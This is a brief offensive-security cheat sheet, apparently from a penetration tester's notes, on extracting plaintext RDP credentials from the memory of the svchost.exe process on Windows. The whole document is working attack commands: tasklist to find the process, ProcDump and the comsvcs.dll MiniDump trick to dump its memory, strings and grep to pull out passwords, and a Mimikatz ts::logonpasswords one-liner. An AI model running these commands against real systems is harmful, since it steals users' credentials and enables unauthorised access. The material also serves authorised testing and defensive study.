# svchost.exe

* <https://www.n00py.io/2021/05/dumping-plaintext-rdp-credentials-from-svchost-exe/>

Locate the svchost.exe process that hosts the RDP session (the one with rdpcorets.dll loaded); it keeps the credentials of the logged-on RDP user in plaintext:

```
Cmd > tasklist /M:rdpcorets.dll
```

Use ProcDump or the MiniDump export of comsvcs.dll to dump the process memory (both need an elevated shell; `-ma` writes a full dump and `-64` forces a 64-bit dump on 64-bit Windows):

```
Cmd > .\procdump64.exe -accepteula -64 -ma <PROCESS_PID> svchost.dmp
Cmd > rundll32.exe C:\windows\System32\comsvcs.dll, MiniDump <PROCESS_PID> C:\Windows\Temp\svchost.dmp full
```

Grep the dump for plaintext passwords (`-el` extracts 16-bit little-endian strings, i.e. the UTF-16LE encoding Windows uses in memory; the password sits next to the username):

```
$ strings -el svchost.dmp | grep <USERNAME> -C1
```

## Mimikatz

```
Cmd > .\mimikatz.exe "privilege::debug" "token::elevate" "log out.txt" "ts::logonpasswords" "exit"
```
